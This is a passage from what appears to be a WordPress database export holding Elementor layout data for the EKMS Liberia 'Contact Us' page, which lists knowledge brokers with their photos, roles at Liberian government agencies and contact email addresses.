Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><\\/p><p>EIA Manager, FDA<\\/p><p><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19804,2897,'_elementor_edit_mode','builder'),(19805,2897,'_elementor_template_type','wp-page'),(19806,2897,'_elementor_version','2.7.5'),(19807,2897,'_wp_page_template','default'),(19808,2897,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_la